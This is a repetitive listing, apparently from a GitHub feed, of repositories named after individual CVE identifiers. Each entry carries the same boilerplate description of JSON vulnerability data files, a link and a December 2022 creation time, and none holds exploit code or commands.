**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27670 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27670](https://github.com/Live-Hack-CVE/CVE-2020-27670) create time: 2022-12-24T17:57:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8619 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8619](https://github.com/Live-Hack-CVE/CVE-2020-8619) create time: 2022-12-24T17:57:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8866](https://github.com/Live-Hack-CVE/CVE-2020-8866) create time: 2022-12-24T17:56:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8831 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8831](https://github.com/Live-Hack-CVE/CVE-2020-8831) create time: 2022-12-24T17:56:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8834 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8834](https://github.com/Live-Hack-CVE/CVE-2020-8834) create time: 2022-12-24T17:56:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7017](https://github.com/Live-Hack-CVE/CVE-2020-7017) create time: 2022-12-24T17:55:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7733 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7733](https://github.com/Live-Hack-CVE/CVE-2020-7733) create time: 2022-12-24T17:54:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8794 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8794](https://github.com/Live-Hack-CVE/CVE-2020-8794) create time: 2022-12-24T17:19:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9402 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9402](https://github.com/Live-Hack-CVE/CVE-2020-9402) create time: 2022-12-24T17:18:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12516](https://github.com/Live-Hack-CVE/CVE-2020-12516) create time: 2022-12-24T17:18:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32503 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32503](https://github.com/Live-Hack-CVE/CVE-2021-32503) create time: 2022-12-24T18:01:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33083 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33083](https://github.com/Live-Hack-CVE/CVE-2021-33083) create time: 2022-12-24T18:00:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26336 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26336](https://github.com/Live-Hack-CVE/CVE-2021-26336) create time: 2022-12-24T17:59:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33082 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33082](https://github.com/Live-Hack-CVE/CVE-2021-33082) create time: 2022-12-24T17:59:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33080 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33080](https://github.com/Live-Hack-CVE/CVE-2021-33080) create time: 2022-12-24T17:59:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21708 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21708](https://github.com/Live-Hack-CVE/CVE-2021-21708) create time: 2022-12-24T17:58:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4156 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4156](https://github.com/Live-Hack-CVE/CVE-2021-4156) create time: 2022-12-24T17:58:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23841](https://github.com/Live-Hack-CVE/CVE-2021-23841) create time: 2022-12-24T17:55:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44396 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44396](https://github.com/Live-Hack-CVE/CVE-2021-44396) create time: 2022-12-24T17:55:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44418 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44418](https://github.com/Live-Hack-CVE/CVE-2021-44418) create time: 2022-12-24T17:55:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40556](https://github.com/Live-Hack-CVE/CVE-2021-40556) create time: 2022-12-24T17:55:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20218 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20218](https://github.com/Live-Hack-CVE/CVE-2019-20218) create time: 2022-12-24T17:55:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27440 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27440](https://github.com/Live-Hack-CVE/CVE-2021-27440) create time: 2022-12-24T17:55:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21104 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21104](https://github.com/Live-Hack-CVE/CVE-2021-21104) create time: 2022-12-24T17:54:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21105 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21105](https://github.com/Live-Hack-CVE/CVE-2021-21105) create time: 2022-12-24T17:54:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21103 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21103](https://github.com/Live-Hack-CVE/CVE-2021-21103) create time: 2022-12-24T17:54:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21093 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21093](https://github.com/Live-Hack-CVE/CVE-2021-21093) create time: 2022-12-24T17:54:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21092 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21092](https://github.com/Live-Hack-CVE/CVE-2021-21092) create time: 2022-12-24T17:54:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21082 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21082](https://github.com/Live-Hack-CVE/CVE-2021-21082) create time: 2022-12-24T17:54:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27598 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27598](https://github.com/Live-Hack-CVE/CVE-2021-27598) create time: 2022-12-24T17:53:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27434](https://github.com/Live-Hack-CVE/CVE-2021-27434) create time: 2022-12-24T17:53:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27477 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27477](https://github.com/Live-Hack-CVE/CVE-2021-27477) create time: 2022-12-24T17:53:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36015 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36015](https://github.com/Live-Hack-CVE/CVE-2021-36015) create time: 2022-12-24T17:52:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36009 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36009](https://github.com/Live-Hack-CVE/CVE-2021-36009) create time: 2022-12-24T17:52:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36017](https://github.com/Live-Hack-CVE/CVE-2021-36017) create time: 2022-12-24T17:52:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35936 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35936](https://github.com/Live-Hack-CVE/CVE-2021-35936) create time: 2022-12-24T17:52:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36000 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36000](https://github.com/Live-Hack-CVE/CVE-2021-36000) create time: 2022-12-24T17:52:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35999 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35999](https://github.com/Live-Hack-CVE/CVE-2021-35999) create time: 2022-12-24T17:52:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35997](https://github.com/Live-Hack-CVE/CVE-2021-35997) create time: 2022-12-24T17:52:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35996 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35996](https://github.com/Live-Hack-CVE/CVE-2021-35996) create time: 2022-12-24T17:52:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24780 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24780](https://github.com/Live-Hack-CVE/CVE-2022-24780) create time: 2022-12-24T18:01:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22970 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22970](https://github.com/Live-Hack-CVE/CVE-2022-22970) create time: 2022-12-24T18:00:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28815 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28815](https://github.com/Live-Hack-CVE/CVE-2022-28815) create time: 2022-12-24T18:00:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41138 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41138](https://github.com/Live-Hack-CVE/CVE-2022-41138) create time: 2022-12-24T18:00:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30578 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30578](https://github.com/Live-Hack-CVE/CVE-2022-30578) create time: 2022-12-24T18:00:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1920 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1920](https://github.com/Live-Hack-CVE/CVE-2022-1920) create time: 2022-12-24T17:59:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2122](https://github.com/Live-Hack-CVE/CVE-2022-2122) create time: 2022-12-24T17:59:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34046 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34046](https://github.com/Live-Hack-CVE/CVE-2022-34046) create time: 2022-12-24T17:59:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2415 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2415](https://github.com/Live-Hack-CVE/CVE-2022-2415) create time: 2022-12-24T17:59:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26074 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26074](https://github.com/Live-Hack-CVE/CVE-2022-26074) create time: 2022-12-24T17:58:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1271 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1271](https://github.com/Live-Hack-CVE/CVE-2022-1271) create time: 2022-12-24T17:58:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25313](https://github.com/Live-Hack-CVE/CVE-2022-25313) create time: 2022-12-24T17:58:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25584](https://github.com/Live-Hack-CVE/CVE-2022-25584) create time: 2022-12-24T17:58:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25373 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25373](https://github.com/Live-Hack-CVE/CVE-2022-25373) create time: 2022-12-24T17:58:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24545](https://github.com/Live-Hack-CVE/CVE-2022-24545) create time: 2022-12-24T17:57:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25235](https://github.com/Live-Hack-CVE/CVE-2022-25235) create time: 2022-12-24T17:57:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21167](https://github.com/Live-Hack-CVE/CVE-2022-21167) create time: 2022-12-24T17:57:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24851 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24851](https://github.com/Live-Hack-CVE/CVE-2022-24851) create time: 2022-12-24T17:57:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24735](https://github.com/Live-Hack-CVE/CVE-2022-24735) create time: 2022-12-24T17:57:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24736 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24736](https://github.com/Live-Hack-CVE/CVE-2022-24736) create time: 2022-12-24T17:56:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1183 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1183](https://github.com/Live-Hack-CVE/CVE-2022-1183) create time: 2022-12-24T17:56:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28660 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28660](https://github.com/Live-Hack-CVE/CVE-2022-28660) create time: 2022-12-24T17:56:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29170 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29170](https://github.com/Live-Hack-CVE/CVE-2022-29170) create time: 2022-12-24T17:56:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33105 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33105](https://github.com/Live-Hack-CVE/CVE-2022-33105) create time: 2022-12-24T17:56:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31144](https://github.com/Live-Hack-CVE/CVE-2022-31144) create time: 2022-12-24T17:55:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33884 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33884](https://github.com/Live-Hack-CVE/CVE-2022-33884) create time: 2022-12-24T17:55:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2738 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2738](https://github.com/Live-Hack-CVE/CVE-2022-2738) create time: 2022-12-24T17:55:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26925 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26925](https://github.com/Live-Hack-CVE/CVE-2022-26925) create time: 2022-12-24T17:55:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29148 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29148](https://github.com/Live-Hack-CVE/CVE-2022-29148) create time: 2022-12-24T17:55:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34709](https://github.com/Live-Hack-CVE/CVE-2022-34709) create time: 2022-12-24T17:55:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19615 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19615](https://github.com/Live-Hack-CVE/CVE-2018-19615) create time: 2022-12-24T16:37:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5820 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5820](https://github.com/Live-Hack-CVE/CVE-2019-5820) create time: 2022-12-24T17:15:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5787 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5787](https://github.com/Live-Hack-CVE/CVE-2019-5787) create time: 2022-12-24T17:15:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5789 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5789](https://github.com/Live-Hack-CVE/CVE-2019-5789) create time: 2022-12-24T17:15:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5791 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5791](https://github.com/Live-Hack-CVE/CVE-2019-5791) create time: 2022-12-24T17:14:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5788 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5788](https://github.com/Live-Hack-CVE/CVE-2019-5788) create time: 2022-12-24T17:14:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5790 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5790](https://github.com/Live-Hack-CVE/CVE-2019-5790) create time: 2022-12-24T17:14:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5792 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5792](https://github.com/Live-Hack-CVE/CVE-2019-5792) create time: 2022-12-24T17:14:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5793 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5793](https://github.com/Live-Hack-CVE/CVE-2019-5793) create time: 2022-12-24T17:14:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5798](https://github.com/Live-Hack-CVE/CVE-2019-5798) create time: 2022-12-24T17:14:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5795 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5795](https://github.com/Live-Hack-CVE/CVE-2019-5795) create time: 2022-12-24T17:14:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5799](https://github.com/Live-Hack-CVE/CVE-2019-5799) create time: 2022-12-24T17:14:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5800](https://github.com/Live-Hack-CVE/CVE-2019-5800) create time: 2022-12-24T17:14:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5801 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5801](https://github.com/Live-Hack-CVE/CVE-2019-5801) create time: 2022-12-24T17:14:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5803](https://github.com/Live-Hack-CVE/CVE-2019-5803) create time: 2022-12-24T17:14:04Z

